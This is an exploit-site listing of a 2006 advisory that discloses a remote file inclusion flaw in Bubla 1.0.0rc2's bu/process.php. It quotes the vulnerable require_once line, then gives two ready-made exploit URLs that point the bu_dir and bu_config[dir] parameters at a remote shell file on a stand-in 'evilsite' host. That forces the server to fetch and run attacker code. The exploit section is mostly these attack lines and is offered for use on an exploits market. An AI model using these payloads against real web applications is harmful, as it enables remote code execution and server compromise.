[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability

Author
DeltahackingTEAM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1329
Category
web applications
Date add
27-12-2006
Platform
unsorted
====================================================================
Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability
====================================================================



**********************************************************************************************************
                                              DeltasecurityTEAM
**********************************************************************************************************

* Portal Name = Bubla <= 1.0.0rc2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
Vulnerable code in process.php

require_once($bu_dir."/bu_l2.php");

--------------------------------------------------------------------------------------------

- Exploit:

1.0.0 RC1 http://localhost/[PATH]/bu/process.php?bu_dir=http://evilsite/Shell.php?
1.0.0 RC2 http://localhost/[PATH]/bu/process.php?bu_config[dir]=http://evilsite/Shell.php?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************




#  0day.today [2024-12-27]  #